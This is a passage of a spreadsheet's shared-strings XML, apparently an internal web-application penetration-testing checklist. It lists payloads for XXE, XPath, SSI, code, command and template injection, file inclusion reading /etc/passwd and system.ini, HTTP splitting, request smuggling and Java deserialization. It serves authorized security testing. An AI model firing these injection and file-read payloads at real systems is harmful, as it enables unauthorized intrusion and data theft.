      <t xml:space="preserve"> - By adding an open or closed angular parenthesis in a user input
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Comment tag: &lt;!--/--&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - This sequence of characters is interpreted as the beginning/end of a comment. 
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Ampersand: &amp;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - The ampersand is used in the XML syntax to represent entities. The format of an entity is '&amp;symbol;'. An entity is mapped to a character in the Unicode character set.
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>CDATA section delimiters: &lt;![CDATA[ / ]]&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - CDATA sections are used to escape blocks of text containing characters which would otherwise be recognized as markup. In other words, characters enclosed in a CDATA section are not parsed by an XML parser.
External Entity:
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;
 &lt;!DOCTYPE foo [  
  &lt;!ELEMENT foo ANY &gt;
  &lt;!ENTITY xxe SYSTEM "file:///dev/random" &gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;</t>
    </r>
  </si>
  <si>
    <t>XPath Injection</t>
  </si>
  <si>
    <t>PTC-PEN-IVID-0007</t>
  </si>
  <si>
    <t>Similar to SQLi. Inject the payloads and observe the difference from normal response. Instead of SQL queries, use XPath syntax to inject.
Payloads:
' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
@*
count(/child::node())
x' or name()='username' or 'x'='y</t>
  </si>
  <si>
    <t>Server Side Include</t>
  </si>
  <si>
    <t>PTC-PEN-IVID-0008</t>
  </si>
  <si>
    <t>Inject SSI tags specific to framework used in target server. SSI is a feature given by servers to allow developers to execute code dynamically. Try to misuse the feature.
Payloads:
&lt;!--#echo var="DATE_LOCAL" →
&lt;!--#include virtual="/cgi-bin/counter.pl" →
&lt;!--#include virtual="/footer.html" →
&lt;!--#exec cmd="ls" →
&lt;!--#include virtual="/etc/passwd" →
Referer: &lt;!--#exec cmd="/bin/ps ax"--&gt;
User-Agent: &lt;!--#include virtual="/proc/version"--&gt;</t>
  </si>
  <si>
    <t>Code Injection</t>
  </si>
  <si>
    <t>PTC-PEN-IVID-0009</t>
  </si>
  <si>
    <t>Identify the programming language used by target server and inject the code for same:
Payloads:
phpinfo();//
;phpinfo();//
'phpinfo();//
“phpinfo();//</t>
  </si>
  <si>
    <t>Command Injection</t>
  </si>
  <si>
    <t>PTC-PEN-IVID-0010</t>
  </si>
  <si>
    <t>Inject below payload and observe the delay in response to confirm the execution of the OS command
Payloads: (Below list is for windows target server. For linux target server replace 'timeout 10' in payloads by 'sleep 10')
+|+timeout 10+c:\
$+|+timeout 10+c:\
%26%26+|+timeout 10 c:\
$%26%26timeout 10 c:\
%0a+timeout 10+c:\
+|+timeout 10+c:%255c
$+|+timeout 10+c:%255c
%26%26+|+timeout 10 c:%255c
$%26%26timeout 10+c:%255c
%0a+timeout 10+c:%255c
+|+timeout 10+c:%2f
$+|+timeout 10+c:%2f
%26%26+|+timeout 10 c:%2f
$%26%26timeout 10+c:%2f
%0a+timeout 10+c:%2f
+timeout 10+c:\+|
+|+timeout 10+c:\+|
+|+timeout 10+c:%2f+|
timeout 10+c:\
||+timeout 10|c:\
||timeout 10||
&amp;timeout 10&amp;
&amp;&amp;timeout 10&amp;&amp;</t>
  </si>
  <si>
    <t>Mostly reported by tools as false positve , manually need to be verified</t>
  </si>
  <si>
    <t>Local File Inclusion</t>
  </si>
  <si>
    <t>PTC-PEN-IVID-0011</t>
  </si>
  <si>
    <t>Inject below payloads (File paths) in identified input parameters and look for mentioned file content in server response.
Easy way to find possible vulnerable input parameter is to look for parameters which has file-name in values 
(traverse back till 10 ../ OR ..\ for below files)
Windows Based Server:
C:\Windows\system.ini
..\system.ini
..\..\system.ini
..\..\..\system.ini
Linux Based Server:
/etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
Refer PTC-PEN-IVID-0011.txt for advanced payloads</t>
  </si>
  <si>
    <t>Remote File Inclusion</t>
  </si>
  <si>
    <t>PTC-PEN-IVID-0012</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Observe input parameters and identify which takes external link/filename and includes it in response (Either content of external file OR the link to external file).
Inject below payloads in such parameters and observe the response for either content of external file or link to it.
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="12"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>http://www.google.com/humans.txt
http://www.ethicalhack3r.co.uk/files/xss/xss.html
http://www.ethicalhack3r.co.uk/files/xss/xss.js
http://www.ethicalhack3r.co.uk/files/xss/xss.svg
http://www.google.com/robots.txt</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> 
http://www.google.com/robots.txt? 
</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="12"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>http://www.google.com/robots.txt%23</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> 
</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="10"/>
        <color indexed="12"/>
        <rFont val="Arial"/>
        <family val="1"/>
      </rPr>
      <t>data://text/plain;base64,SSBsb3ZlIFBIUAo</t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Arial"/>
        <family val="1"/>
      </rPr>
      <t>=
php://filter/convert.base64-encode/resource=index.php</t>
    </r>
  </si>
  <si>
    <t>Invalidated Redirects</t>
  </si>
  <si>
    <t>PTC-PEN-IVID-0013</t>
  </si>
  <si>
    <t>1. Observe the requests and 302 responses
2. Identify the parameters whose values are URL's
3. Insert a malicious site URL in those parameters
4. Application is vulnerable if its redirecting to above malicious site</t>
  </si>
  <si>
    <t>File Upload</t>
  </si>
  <si>
    <t>PTC-PEN-IVID-0014</t>
  </si>
  <si>
    <t>Identify File Upload functionality in target application and try below scenarios to upload unintended filetypes or malicious files
* Files with unintended filetype (If only PDF is allowed, then try to bypass client side validation using proxy and upload other types of file)
* Use null characters in filename (test.exe%00.pdf)
* Try upload malicious files (Construct an .bat file with below content, it is a test malware)
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
* Try upload large file, or bypass filesize limitation client side validation using proxy
* Observe the access to uploaded files. If it is opens in browser, try upload HTML like files.</t>
  </si>
  <si>
    <t>Request Smuggling</t>
  </si>
  <si>
    <t>Request Smuggling in HTTP/1.1:
1. Check Proxy for occurences of any TE/CL headers in response.
2. Check for requests that reflect some values in request headers directly and unfiltered in response header.
3. Enable HTTP Request Smuggler extension in Burp and perform a simple Smuggle Probe
4. Based on smuggle probe results, perform further attacks using the Extender.
5. Manually, try sending the payloads as mentioned here: https://portswigger.net/web-security/request-smuggling/finding.
Note: The 3 scenarios needs to be checked depending upon the server implementation. Also, in case of a GET request, change the request method to POST and perform the same steps.
Request Smuggling in HTTP/2:
1. Using Curl, check whether the application is serving responses on HTTP/1.1 or not. (Use --http1.1 flag)
2. Check for requests that are reflecting header values in response without any change. Also, check for CL/TE headers being used in response or not.
3. Select the vulnerable request and perform smuggle probe using extender.
4. Try test cases mentioned here:
a. Inject an arbitrary content-length and then smuggle a request.
b. Inject a transfer-encoding header and a malformed request body. Submit it multiple times by running a Turbo Intruder session using HTTP Request Smuggler extension to exploit it further.
c. Inject additional \r\n in the header value along with the payload.
d. Inject payload in the header value; try running a Turbo Intruder via HTTP Request Smuggler extension and hit the backend server multiple times with the same request.
e. Include the payload in the header-name with appropriate escaping.
f. Inject the payload in the method line. Apply appropriate character encoding if required.</t>
  </si>
  <si>
    <t>For HTTP/1.1 Request Smuggling:
Burp Extension: HTTP Request Smuggler 
(Pre-requisite - Burp Turbo Intruder Extender)
1. Enable the extension. Check the Output column for confirming that the extension is loaded.
2. Right-click on any request crawled &gt; Extensions &gt; HTTP Request Smuggler &gt; Smuggle Probe (1st option)
3. After sometime, potentially vulnerable requests will get displayed as vulnerable to request smuggling in the Dashboard.
4. Send the request to repeater and right click again. Extensions &gt; HTTP Request Smuggler.
5. Select 'Smuggle Attack (CL.TE)' if the extender reports possible CL.TE vulnerability. Else, select 'Smuggle Attack (TE.CL)' if extender reports possible TE.CL vulnerability.
6. Change the value of prefix variable in the script:
a. CL.TE -&gt; set prefix to G
b. TE.CL -&gt; set prefix to 
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
For HTTP/2 Request Smuggling:
Burp Extension: HTTP Request Smuggler (Pre-requisite - Burp Turbo Intruder Extender)
1. Enable the extension. Check the Output column for confirming that the extension is loaded.
2. Right-click on any request crawled &gt; Extensions &gt; HTTP Request Smuggler &gt; HTTP/2 smuggle probe.
3. After somtime, vulnerable request would appear in dashboard. Send the request in repeater and perform further attack.
4. In repeater tab, disable content-length, enable 'HTTP/2 ALPN override' and use Inspector tab to correctly tamper the header values.
5. Tamper the headers, body as per the test cases that are mentioned in the portswigger link.
6. Refer the labs to better understand the usage of the HTTP Request Smuggler extender for exploiting HTTP/2-based vulnerabilities</t>
  </si>
  <si>
    <t>https://portswigger.net/web-security/request-smuggling/finding
https://github.com/PortSwigger/http-request-smuggler
https://isljazzrtc.in.ibm.com:9552/ccm/resource/itemName/com.ibm.team.workitem.WorkItem/62242
https://isljazzrtc.in.ibm.com:9552/ccm/web/projects/PTSS%20Projects#action=com.ibm.team.workitem.viewWorkItem&amp;id=96732
 (you may try looking up for more workitems)
https://portswigger.net/web-security/request-smuggling/advanced (HTTP/2)</t>
  </si>
  <si>
    <t>PTC-PEN-IVID-0015</t>
  </si>
  <si>
    <t>Observe the requests and responses of application and look for responses which reflects the user input values in response headers. Try to inject newline in such requests to exploit HTTP Splitting                                                           
Sample Payloads:%0D%0ATestHeader:%20test                                                  \r\nTestHeader: test</t>
  </si>
  <si>
    <t>Web Parameter Tampering / Form Manipulation</t>
  </si>
  <si>
    <t>PTC-PEN-IVID-0016</t>
  </si>
  <si>
    <t>Check for if the application using any sensitive parameter in hidden field or in read only mode, try to manipulate the value in browser by inspecting element or by intercepting in burp. 
Example Test Scenario:
You may find this vulnerability in application, which uses some sensitive parameter like price, quantity, count, etc. For example, consider online shopping/ekart application has the sensitve parameter such as price and quantity of particular product, an attacker tries to buy a product and manipulating post body values after intercepting the request in tool (in most cases it would be encrypted/encoded, try decrypt/decode to change the value) and triger the request with manipulated value to exploit this vulnerability. This would result in paying less though the product price is fixed or you can buy more quantity by paying for single product.</t>
  </si>
  <si>
    <t>Burp/Firebug addon</t>
  </si>
  <si>
    <t>Reference:
https://www.youtube.com/watch?v=3VMlV7j_yzg&amp;feature=youtu.be</t>
  </si>
  <si>
    <t>AngularJs  injection</t>
  </si>
  <si>
    <t>PTC-PEN-IVID-0017</t>
  </si>
  <si>
    <t>Do some information gathering on application to find which version is being used. For example, when an application uses java based template engine such as FreeMarker try to embed angular JS payload.
Injection Methodology:
1. Detect
2. Identify(Try to find angularjs version which is used in application by inspecting element, with that information try for version besed attack.)
3. Exploit
Reference: http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html
                                                                                                                                                               Test Scenario:
{{5*5}}
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
For example, in an input field try to pass the above given expression to check whether the application is vulnerable or not. The evaluation of input value or execution of script could be vulnerable for this attack such as redirect users to a malicious page and potentially hijack their session tokens or other sensitive data. Impact will be similar like XSS.</t>
  </si>
  <si>
    <t>Server side template injection (NodeJS)</t>
  </si>
  <si>
    <t>PTC-PEN-IVID-0018</t>
  </si>
  <si>
    <t xml:space="preserve">Basically try to find which version of nodeJs running on application, also check whether the application uses any of the following function such as eval(). setTimeout(), setInterval(), Function(). By using this vulnerability an attacker can inject arbitrary JavaScript code to be executed on the server.
Template Injection Methodology:
1. Identify the vulnerable parameter
2. Choose the payload based on the template/version of nodeJS
2. Exploit
Reference:
http://nodegoat.herokuapp.com/tutorial/a1
http://blog.portswigger.net/2015/08/server-side-template-injection.html
https://ckarande.gitbooks.io/owasp-nodegoat-tutorial/content/tutorial/a1_-_server_side_js_injection.html
Test Scenario:
{{ '7'*7 }}
{{ [].class.base.subclasses() }} # get all classes
{{''.class.mro()[1].subclasses()}}
{%for c in [1,2,3] %}{{c,c,c}}{% endfor %}
For example, in an input field try to pass the above given expression to check whether the application is vulnerable or not. The evaluation of input value or execution of script could be vulnerable for this attack such as shutdown the server, compromise the server, RCE, etc., 
Another potential goal of an attacker might be to read the contents of files from the server. For example, following two commands list the contents of the current directory and parent directory respectively:
res.end(require('fs').readdirSync('.').toString())
res.end(require('fs').readdirSync('..').toString()) </t>
  </si>
  <si>
    <t>XSS using postMessage in JSON</t>
  </si>
  <si>
    <t>PTC-PEN-IVID-0019</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">The applications that uses PostMessage feature can be  identified and tested using a client side JavaScript library called PMHook which is designed to be used with TamperMonkey Extension. Install PMHook as UserScript via TamperMonkey dashboard. Now access </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">https://sentinel.appcheck-ng.com/static/pm/logger.html </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>and click on Dump handlers to list all event handlers and associated messages. Identified a listener and click on replay button to open the fuzzing tool. The URL and Message fields should be automatically populated. Click “Load in iFrame” to load target within the iFrame tab. Clicking the “Perform Simple Fuzz” button will inject a series of XSS payloads at various positions within the message in an attempt to trigger an alert box. You can also use manual payloads. Each successful alert box contains a numeric value that can be referenced against the Fuzzer Log tab to identify each successful payload.
1. Using posta extension in your chrome browser, check if there are any post messages communication or event listeners present in the application.
The post-messages will be shown in the posta web-page for this application.
2. Check if there are any event listeners present in the application.
3. If there are any event listeners, check if they are validating the origin before proceeding with processing the incoming the Postmessage event.
	- For e.g. There will be code logic to check if the 'event.origin' is from certain domains.
4. The origin should be validated properly. The tester should check if in any ways the origin can be bypassed.
	- For e.g. They might be using loose logic to validate the origin, such as use of wildcards like '*.example.com' which can be bypassed by other subdomans unless it was intended for.
	- They might use simple string matching techniques to check if certain substring is present in the whole domain like 'if "example.com" in domain', which can easily be bypassed by creating and using a domain like 'example.com.attack.com'.
	- The bypassing techniques depends on the kind of validation implemented. Try with such payloads accordingly.
5. If the origin is validated properly, check if the incoming input is validated properly before it being processed by the event listener.
	- Check any Injection payloads are possible here. In General XSS payloads can be tested here.
	- If the user provided input is processed in the backend at any point of time, try with other server related Injection payloads such as SQL, OS, SSI, SSRF, XSI etc.
6. The input string/object should be validated properly. The tester should check if in any ways the input string can be bypassed to inject a malicious payload.</t>
    </r>
  </si>
  <si>
    <t>Tamper Monkey Add-on, pmhook.js
POSTA chrome extension
1. Install Posta extension in your chrome browser.
2. Enable the posta extension and crawl the application.
3. A seperate web page will be available to access the postmessage details of the current crawled web application. The URL can be accessed from the posta extension widget in chrome browser.
4. All the post message communications will be recorded in the posta tool site.
5. verify the Event listeners and check for validations as per the testcases.</t>
  </si>
  <si>
    <t>https://www.exploit-db.com/docs/40287.pdf
https://github.com/benso-io/posta
Session Recording - https://ibm.ent.box.com/folder/160862556587</t>
  </si>
  <si>
    <t>Tab Nabbing (target="_blank")</t>
  </si>
  <si>
    <t>PTC-PEN-IVID-0020</t>
  </si>
  <si>
    <t xml:space="preserve">Target may be vulnerable to tab nabbing if there is a provision to inject links into application and clicking on that link would open a new tab. Host a local server with index page containing the given code and inject the link to index page in application. On clicking the injected link, if a new tab is being opened and the main tab containing the application is being replaced by demo.testfire.net, then the application is vulnerable to tab nabbing.  </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
&lt;head&gt;
&lt;/head&gt;
&lt;body&gt;
Tab nabbing validator
&lt;script language="javascript"&gt;
window.opener.location = 'https://demo.testfire.net'
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt; </t>
  </si>
  <si>
    <t>Server Side Request Forgery</t>
  </si>
  <si>
    <t>1. Identify a point where there is Out Of Band Resource Loading, basically a point wherein contents of another application can be loaded within the response. 
2. If OOBRL can't be found, identify a parameter that accepts URL as a parameter as well as make sure that the server interacts with the URL in the backend. Interaction of the server with the inputted URL might lead to URL Redirection or HTTP External Service Interaction too.
3. Once the parameter is found try to enumerate various protocols like https / ldap / ssh / file / ftp ............etc
4. Try to enumerate the IP Address that can be accessed through the vulnerable parameter.
    Eg: localhost / 127.0.0.1 / [::1] (IPv6 format of localhost) or analyse the application if it discloses internal ip address by any means.
5. Try to enumerate port number corresponding to the IP address.
[Note: Do keep an eye on the way application returns the response as it might vary from application to application]</t>
  </si>
  <si>
    <t>Burp Suite</t>
  </si>
  <si>
    <t>RTC ID 48360, https://medium.com/@logicbomb_1/the-unusual-case-of-open-redirection-to-aws-security-credentials-compromise-59acc312f02b, https://medium.com/@logicbomb_1/the-journey-of-web-cache-firewall-bypass-to-ssrf-to-aws-credentials-compromise-b250fb40af82, https://medium.com/@rootxharsh_90844/vimeo-ssrf-with-code-execution-potential-68c774ba7c1e, https://medium.com/@w_hat_boy/server-side-request-forgery-ssrf-port-issue-hidden-approch-f4e67bd8cc86</t>
  </si>
  <si>
    <t>Java Serialization Attack</t>
  </si>
  <si>
    <t>PTC-PEN-SMID-0010</t>
  </si>
  <si>
    <t xml:space="preserve">Check if there is any java serialized object present in HTTP request. If present generate serialized payload, Inject the payload and observe response.
    Analyze the application requests and identify anything that looks like serialized data.
    Serialized data can have the below-mentioned patterns / identifiers: 
        "AC ED 00 05" in Hex
        "rO0" in Base64
        JavaServer Faces (JSF) View State / javax.faces.ViewState
        ASP.Net _VIEWSTATE as it can be in either of these format Base64 /Base64 + MAC (Message Authentication Code) Enabled / Base64 + Encrypted
        Content-type = ‘application/x-java-serialized-object
        PhP Serialized Object O:4:"User":2:{s:4:"name":s:6:"carlos"; s:10:"isLoggedIn":b:1;} 
            O:4:"User" - An object with the 4-character class name "User"
            2 - the object has 2 attributes
            s:4:"name" - The key of the first attribute is the 4-character string "name"
            s:6:"carlos" - The value of the first attribute is the 6-character string "carlos"
            s:10:"isLoggedIn" - The key of the second attribute is the 10-character string "isLoggedIn"
            b:1 - The value of the second attribute is the boolean value true
        Check if phar:// style wrappers are being used.
    If manual testing is a challenge then use Burp extender Deserialization Scanner as it has options for performing Manual Testing / Exploitation with custom payloads.
    Also, another Burp extender Java Serialized Payloads can be used for JAVA in order to generate customized payloads.
    For Burp Scanner you can use this extender J2EEScan.
    If you want to generate complicated payloads then you can follow these links:
        https://github.com/pwntester/ysoserial.net
        https://github.com/frohoff/ysoserial
Exploitation can also be performed by jexboss tool which can be accessed from here https://github.com/joaomatosf/jexboss </t>
  </si>
  <si>
    <t>https://github.com/NetSPI/JavaSerialKiller
https://github.com/frohoff/ysoserial.git</t>
  </si>
  <si>
    <t>Log4j Java Library Vulnerability</t>
  </si>
  <si>
    <t>Use the following burp extender for log4j:
https://github.com/silentsignal/burp-log4shell
Steps to perform black box detection.
1. Spider the host in burp.
2. Copy all the urls in the text file
3. Open Burp Collaborator. 
4. Run above tool with the posted txt file and collaborator. 
5. Observe if it gets any hits in Burp 
Affected versions - 2.0 to 2.14.1 [Fixed in 2.15.0]
We will perform the safest way to confirm the vulnerability, getting the ping back on collaborator. The detection is straight forward. One can use manual method as well. But to avoid chances of detection use below tool available for now (which is tried and tested working in demo environment):
https://github.com/takito1812/log4j-detect
The tool is performing checks in the "User-Agent" / "Referer" headers for now. Applications where spring, solr or affected frameworks are used, should not be missed.</t>
  </si>
  <si>
    <t>Burp Collaborator</t>
  </si>
  <si>
    <t>https://github.com/takito1812/log4j-detect</t>
  </si>
  <si>
    <t>GWT vulnerabilities (GWT insertion points)</t>
  </si>
  <si>
    <t>PTC-PEN-IVID-0021</t>
  </si>
  <si>
    <r>
      <t>1)</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> Information Gathering : </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">Confirm whether the application is using GWT framework or not by using Tools, Techniques &amp; Extensions like;
Wappalyzer,Buildwith,Whatweb,HTML page sources for framework disclosures, Request body values, server banners etc.,
2) </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Automated Scanning :</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> If GWT framework is used - Add the Burp extension - </t>
    </r>
    <r>
      <rPr>
        <i/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>GWT Insertion Points</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> and make sure all the automated scans on the target are performed by enabling GWT insertion points extension.
3) </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color indexed="8"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">Manual Testing : </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">Select any request which have some business logic flaws and send it to the intruder </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>using "Send GWT request(s) to intruder option".
Now using the Seclists / Fuzzdb payloads try to fuzz the vulnerable params using Burp intruder.</t>
    </r>
  </si>
  <si>
    <t>Add Burp extension GWT Insertion Points</t>
  </si>
  <si>
    <t>WebApp – Error Handling</t>
  </si>
  <si>
    <t>Stack Trace</t>
  </si>
  <si>
    <t>PTC-PEN-EHID-0001</t>
  </si>
  <si>
    <t>Check invalid input (such as input that is not consistent with application logic).
Check input that contains non alphanumeric characters or query syntax.
Check empty inputs.
Check inputs that are too long.
Check access to internal pages without authentication.
Check bypassing application flow. 
Input these and check if any error is thrown and you can gather any sensitive information</t>
  </si>
  <si>
    <t>File Extensions Handling</t>
  </si>
  <si>
    <t>PTC-PEN-EHID-0002</t>
  </si>
  <si>
    <t>Submit http[s] requests involving different file extensions and verify how they are handled.
*The following file extensions should never be returned by a web server, since they are related to files which may contain sensitive information or to files for which there is no reason to be served.
    .asa
    .inc                                                                                                              
If File Upload functinality is there- then Windows 8.3 legacy file handling can sometimes be used to defeat file upload filters 
Usage Examples:
*file.phtml gets processed as PHP code
*FILE~1.PHT is served, but not processed by the PHP ISAPI handler
*shell.phPWND can be uploaded 
*SHELL~1.PHP will be expanded and returned by the OS shell, then processed by the PHP ISAPI handler.</t>
  </si>
  <si>
    <t>Error Codes</t>
  </si>
  <si>
    <t>PTC-PEN-EHID-0003</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">*Each of the below examples may give specific information about the operating system, application version, etc.
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Test: 404 Not Found</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
telnet &lt;host target&gt; 80
GET /&lt;wrong page&gt; HTTP/1.1
host: &lt;host target&gt;
&lt;CRLF&gt;&lt;CRLF&gt;
Result:
HTTP/1.1 404 Not Found
Date: Sat, 04 Nov 2006 15:26:48 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7g
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1
...
&lt;title&gt;404 Not Found&lt;/title&gt;
...
&lt;address&gt;Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7g at &lt;host target&gt; Port 80&lt;/address&gt;
...
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Test: Network problems leading to the application being unable to access the database server</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
Result:
Microsoft OLE DB Provider for ODBC Drivers (0x80004005) '
[MySQL][ODBC 3.51 Driver]Unknown MySQL server host
Manually check if there is sensitive information revealed</t>
    </r>
  </si>
  <si>
    <t>https://www.owasp.org/index.php/Testing_for_Error_Code_(OTG-ERR-001)</t>
  </si>
  <si>
    <t>WebApp - Cryptographic Issues</t>
  </si>
  <si>
    <t>Weak SSL/TLS</t>
  </si>
  <si>
    <t>PTC-PEN-CRID-0001</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Checking if the Certificate Authority (CA) is a known one
(meaning one considered trusted);
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">• </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">Checking that the certificate is currently valid manually
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">• </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">Checking that the name of the site and the name reported in
the certificate match.                                                                           
Weak ciphers must not be used (e.g. less than 128 bits [10]; no NULL ciphers suite, due to no encryption used; no Anonymous Diffie-Hellmann, due to not provides authentication).
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">• </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">Weak protocols must be disabled (e.g. SSLv2 must be disabled,
due to known weaknesses in protocol design ).
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">• </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">Renegotiation must be properly configured (e.g. Insecure Renegotiation must be disabled, due to MiTM attacks and Client-initiated Renegotiation must be disabled, due to Denial of Service vulnerability  
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">• </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">No Export (EXP) level cipher suites, due to can be easly broken
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">• </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">X.509 certificates key length must be strong (e.g. if RSA or DSA is used the key must be at least 1024 bits).
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">• </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">X.509 certificates must be signed only with secure hashing algoritms (e.g. not signed using MD5 hash, due to known collision attacks on this hash).
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">• </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">Keys must be generated with proper entropy (e.g, Weak Key Generated with Debian) 
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">RC4 should not be used, due to crypto-analytical attacks [15].
